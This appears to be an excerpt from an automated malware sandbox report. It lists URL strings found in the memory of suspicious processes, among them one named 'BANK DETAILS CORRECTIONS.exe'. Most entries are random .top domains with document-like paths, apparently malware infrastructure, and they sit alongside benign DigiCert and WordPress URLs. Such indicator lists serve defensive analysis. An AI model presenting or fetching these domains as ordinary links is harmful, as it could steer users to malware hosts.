Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://cjmb1.9vjyq.top/6vs38u/9x6vjf.xls
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://dnp53gn.ss1yp.top/f9qm/5bqu.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://dof.nqku1.top/7f7/67mxw.xls
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://dz30.d5s8h.top/zlf64/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://ebwdm.3p20h.top/2czgqf4/0jap.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://f00v4l.tz8jk.top/5g5f8nq/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://f1qwfbw.2g6pk.top/c18/w9i.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://f8subyg.x37kb.top/0nln/o72.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://g77.8v089.top/damu1/pl7.xlsx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://h1s.qrqyd.top/krw96/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_279a41fe094a1c0ff59f6d
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_29ed0396622780590223cd
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_3fd2afa98866679439097f
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_7397d1bd83edde12ad6703
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_ac80d98b52b56292f7ce2d
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_b9fc5b4f72501ef8bbdeb4
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/fonts/cantata-one/font)
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/custom-facebook-feed/assets/css/cff-style.min.css?v
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.2
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?v
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.j
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/frontend/woocomme
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ve
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/themes/flash/css/font-awesome.min.css?ver=6.4.3
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-content/themes/flash/css/responsive.min.css?ver=6.4.3
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-includes/css/dashicons.min.css?ver=6.4.3
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hzw.avt.temporary.site/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://iawnh.vwupe.top/5q32v/z1wofb5.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://is4ml0.2xexb.top/z07/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://ix18.oqry7.top/zdg4qfy/stvr0o7.xlsx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://joahk.soaw8.top/0jyift/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://jqyn6d.0dgqo.top/w876/7u54.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://kiwbh1.soaw8.top/pl1wmh/y2yq.ppt
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://lcj05un.1osh5.top/sucui0/7besnu.html
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://lg7.n89m5.top/qu2/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://lxoo4j.laoli666.top/2e0w/xted.html
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://mmhzuz.1cva0.top/k82/3i00.doc
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://osmfn1.djzcz.top/ipb/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://p97bz5o.9rij9.top/3f82i/ffp.xlsx
Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.0000000003E12000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parkingpage.namecheap.com
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://q8s.cjncj.top/26zhgy/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://qs8b6.89of0.top/jxq/1fu9.ppt
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 0000000D.00000002.1361939859.00000000028EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://t17a.77bdh.top/uwfn7k7/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://uj66st1.1lilr.top/lsqbk0/i9kj.ppt
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://ut49ty3.jsj91.top/bcjz/bokt.docx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://wi6o.k831s.top/7rs/rj5r1.ppt
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://wuka.gjgmm.top/9ii7k/
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/08og/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/1dys/2jgjq.docx
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/1zn1q/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/2jtdy62/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/2r7b/mulenc.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/302/riold.ppt
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/3iwe/ay869g.xlsx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/4d7o8gx/wpst3.ppt
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/5wkvv6a/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/6neav/srn3y3.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/7fdwd/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/7qe/8l9zr.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/82shuw/dx44.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/a5y1q3v/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/aek2/l7bry89.html
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/aoekqf/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/can/czydx.docx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/e8miho/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/foxkl2/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/hnvto/h15.html
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/hw8q/jt5zl.docx
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/idvro/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/ik0/
